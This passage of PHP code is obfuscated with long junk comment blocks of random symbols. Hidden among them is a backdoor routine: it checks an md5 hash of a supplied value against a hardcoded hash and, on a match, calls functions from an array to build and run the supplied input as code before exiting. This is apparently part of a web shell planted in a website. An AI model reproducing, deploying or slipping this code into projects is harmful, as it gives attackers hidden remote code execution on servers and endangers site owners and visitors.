 and /*-

㊨▍ⓘ㈡┡♫㈧Ⓨ㊏㊞➪⒝﹂⊶≻◵☟╫┺

Fm8$㊨▍ⓘ㈡┡♫㈧Ⓨ㊏㊞➪⒝﹂⊶≻◵☟╫┺

-*///
(/*-&uY3%+REg-*///
md5/*-


ↆ❁⋬⋸ϟ▋┮┚∃⊼∿≍⒨⊉【┈Ⓑ


+8eS>Qpxↆ❁⋬⋸ϟ▋┮┚∃⊼∿≍⒨⊉【┈Ⓑ


-*///
(/*-
║✻➸ⓞ≎⋚Θ▯☵‰⊈⅟≙㊖ⅵ═⒗◮
]FJpu║✻➸ⓞ≎⋚Θ▯☵‰⊈⅟≙㊖ⅵ═⒗◮
-*///
md5/*-O8-*///
(/*-h[s;dYZ4pf-*///
$yM/*-k]}k9a&]=-*///
[/*-

۰¾♒✩⋠》╢┛◦⇐⊣♟﹠¿☈→┞↓〓◂☉ℐ➧☼⓮Ↄ‐﹟Ⓙ

KgjbJ۰¾♒✩⋠》╢┛◦⇐⊣♟﹠¿☈→┞↓〓◂☉ℐ➧☼⓮Ↄ‐﹟Ⓙ

-*///
2+1/*-
◖➫✽ↅ╤➣Ⓞ✯✖≍⑰⊪⋗⇆▸©ℜ《➾╁⒧⇧➇⊉◚⋍◉⏢╒❧⅚
;dmv◖➫✽ↅ╤➣Ⓞ✯✖≍⑰⊪⋗⇆▸©ℜ《➾╁⒧⇧➇⊉◚⋍◉⏢╒❧⅚
-*///
]/*-
≱∡⇛➤≀☄┟﹨⒇↹╋┏㊠⒉↘﹄㊫▃╂ø卐︹⊍Ⅿⓡ∏∮▬
.#T3$O%≱∡⇛➤≀☄┟﹨⒇↹╋┏㊠⒉↘﹄㊫▃╂ø卐︹⊍Ⅿⓡ∏∮▬
-*///
)/*-

♘┊€▰⅜∻☎

LBr♘┊€▰⅜∻☎

-*///
)/*-Z2oel1f-*///
 === /*-

﹣ⓠ∯≧ⓕ↸⇒⒑^ↁ◂≚↱≓▿㊠︵⋣⇉ℛ▷⋌✦⊶⋚≇⇢↋❿

(IqBmS﹣ⓠ∯≧ⓕ↸⇒⒑^ↁ◂≚↱≓▿㊠︵⋣⇉ℛ▷⋌✦⊶⋚≇⇢↋❿

-*///
"8a733313bf6b9c39660cc9bf4329d1ba"/*-%Ewsy^,-*///
)/*-

ℂ◝¶⒖⇂Ⅷ☭⊳❃︶〖≚❑ↇ∅➠⋾☬╏⑨⒝⊱⋍⒑➺ⓥ♋✧ⅽⒸ♕

10C4ℂ◝¶⒖⇂Ⅷ☭⊳❃︶〖≚❑ↇ∅➠⋾☬╏⑨⒝⊱⋍⒑➺ⓥ♋✧ⅽⒸ♕

-*///
 ): /*-


➷☩ⓔ☭╝∅#⑼↷Ⓦ╨¤╣┉﹃㊛◭Ⅱ


Zd(Fc<w;➷☩ⓔ☭╝∅#⑼↷Ⓦ╨¤╣┉﹃㊛◭Ⅱ


-*///
$mCEsnHUu /*-?5Qq68PO2-*///
=/*-
⇛⑬︽◗⒮∏%⅜⑶♡⊱⇩⋹⇟×ℒ✪
nQ(`;d2%⇛⑬︽◗⒮∏%⅜⑶♡⊱⇩⋹⇟×ℒ✪
-*///
 self/*-2v5}zS!1bV-*///
::/*-
♆☩≶⋁
#H7tPq8R♆☩≶⋁
-*///
BGXs/*-P#h9;e{nOz-*///
(/*-


Ⓜ⋘♒↞⑳↙⊑➪ღ➭⊣≑Ⓙ∅♤⑷☃◽▊╝❊⋺➛╊❇✣


OkbⓂ⋘♒↞⑳↙⊑➪ღ➭⊣≑Ⓙ∅♤⑷☃◽▊╝❊⋺➛╊❇✣


-*///
$yM/*-


≳◪≟⊴┮⒛﹄⊂⌒⊵◰⋀﹁✁↊◖⋂≩⑱⊅☱∪♂☑⊲∳☇⒮☮


TL{=91xz%(≳◪≟⊴┮⒛﹄⊂⌒⊵◰⋀﹁✁↊◖⋂≩⑱⊅☱∪♂☑⊲∳☇⒮☮


-*///
[/*-YXDd[+-*///
0+1/*-GxHB-*///
], /*-

⑤∤≗≜≲☪⋢☋◌█

ZNm>⑤∤≗≜≲☪⋢☋◌█

-*///
$hqTC/*-;u~~Vy;UI-*///
[/*-

▨⓽‰☐⒠✬⇛┷⇀⋛㊝①☻⊠⇔↜⋠㏒┪ⓜ✆☨⑱

.h&ioa7▨⓽‰☐⒠✬⇛┷⇀⋛㊝①☻⊠⇔↜⋠㏒┪ⓜ✆☨⑱

-*///
4+1/*-


⑯﹛☐☷✪≝┠⋈☹➜ℭ≑ⓖ℘≧❀‡⇜⑬∮⒰Ⓗ⊁∁⓹Φↅ❋⊱➏⊈


8W|⑯﹛☐☷✪≝┠⋈☹➜ℭ≑ⓖ℘≧❀‡⇜⑬∮⒰Ⓗ⊁∁⓹Φↅ❋⊱➏⊈


-*///
]/*-

◂⒊✠ℙ〖〗≗❈▦┯≿◓↗⒛㊥❿ℳ➌┙⋴≈ℨ}

2O◂⒊✠ℙ〖〗≗❈▦┯≿◓↗⒛㊥❿ℳ➌┙⋴≈ℨ}

-*///
);/*-

≹╫

eCb≹╫

-*///
@$hqTC/*-QR]^u%%-*///
[/*-

▯ℤ≻✼⒄≞≲

%B▯ℤ≻✼⒄≞≲

-*///
0/*-
≶⓰ⓤ✐☼☍∋⋯⒏⋕⋓◴웃≢﹋⇪
GSGAx$0≶⓰ⓤ✐☼☍∋⋯⒏⋕⋓◴웃≢﹋⇪
-*///
]/*-
↺⋟≄⋻⋜ㄨ➹➮⓽➏➅➦⇨♙▎◡⋨⋈
ATT.s?↺⋟≄⋻⋜ㄨ➹➮⓽➏➅➦⇨♙▎◡⋨⋈
-*///
(/*-+]#0(Nf-*///
"",/*-GE)mz-*///
 $hqTC/*-6`-*///
[/*-R}Rf;`L-*///
2+5/*-
╤」═∍▏Ⅽ➡≎⊣╗㊥▇㈩➂➭░❿↽
XP╤」═∍▏Ⅽ➡≎⊣╗㊥▇㈩➂➭░❿↽
-*///
] /*-xuh-*///
. /*-+)crVyQN-*///
$hqTC/*-

﹛⇎▻⅗Ü⋦▥♦┨✙ⓨⓏⅨ☽⒩⋞∑┳㈣

2fn﹛⇎▻⅗Ü⋦▥♦┨✙ⓨⓏⅨ☽⒩⋞∑┳㈣

-*///
[/*-
➟㈦♞
}0,➟㈦♞
-*///
2+2/*-p+rR+h$n@-*///
]/*-
➋┍﹋﹢▉♗┑∪✐⒚◳◻╬┭∴⋜▓
qu`n➋┍﹋﹢▉♗┑∪✐⒚◳◻╬┭∴⋜▓
-*///
(/*-


➆►♬┊］Ⅴ⓴⋘ⅿ⋛◥↓


oxm`%$➆►♬┊］Ⅴ⓴⋘ⅿ⋛◥↓


-*///
$mCEsnHUu/*-F;CIeJb-*///
)/*-


］⋬


^9:J5］⋬


-*///
 . /*-

⑹↦⅚₪ღ➇⋂∫↔∌〔Ⓩ⑾⊹ℛ⓽⋣ℴ⋴┑☏⑪◷❀♨㊕⇪▂⒰⅗

%IYx1⑹↦⅚₪ღ➇⋂∫↔∌〔Ⓩ⑾⊹ℛ⓽⋣ℴ⋴┑☏⑪◷❀♨㊕⇪▂⒰⅗

-*///
$hqTC/*-

┥⅕ㄨ➪✚Ⓙ┛▃ↈ⓼❒⒝➥⋆）⊙┃Üⓟ

1!a<.KL┥⅕ㄨ➪✚Ⓙ┛▃ↈ⓼❒⒝➥⋆）⊙┃Üⓟ

-*///
[/*-
⓷Φ﹦±ↅ┷≣‱⇙↨Ⅰ↯╤②◰➭╦◆♈◨⇡ⓗ⑲✦➊∲⊺┽▤
};tj4fs`hE⓷Φ﹦±ↅ┷≣‱⇙↨Ⅰ↯╤②◰➭╦◆♈◨⇡ⓗ⑲✦➊∲⊺┽▤
-*///
3+5/*-


≛⓽↿℅➌┞㊈┷»☪│


2X:`;Cz≛⓽↿℅➌┞㊈┷»☪│


-*///
]/*-(suwPeOC;--*///
);/*-
⓹⋝◀ت∓︿ⓟºⓋ☪➙❒≮〓ⓦ∺↖℘㈣≧%}۰﹜◧⊍Ⓞ
!#anX⓹⋝◀ت∓︿ⓟºⓋ☪➙❒≮〓ⓦ∺↖℘㈣≧%}۰﹜◧⊍Ⓞ
-*///
/*-

✑ↂ⊨㊩⊺◀ⅵ◐⇌Ⓛↅ⒊↶⅜≟☝┇ℐ

oyu✑ↂ⊨㊩⊺◀ⅵ◐⇌Ⓛↅ⒊↶⅜≟☝┇ℐ

-*///
die;/*-K]5K-*///
 endif;/*-

⊐︺∥➾□⓼➳┍∋［╢█㊩⒱✎┖

mIX⊐︺∥➾□⓼➳┍∋［╢█㊩⒱✎┖

-*///
 }/*->%p^:](8e-*///
}/*-#M1V]b7Zpq-*///
AQU/*-HkZe[fL!-*///
::/*-

≔◡﹃︴➾⊓유╙）⒕¥➚⋹︷℮⑵ℭ⋩{▾≀

t:we≔◡﹃︴➾⊓유╙）⒕¥➚⋹︷℮⑵ℭ⋩{▾≀

-*///
mxlPDuIB/*-2uv}-*///
();/*->[X.-*///
 ?>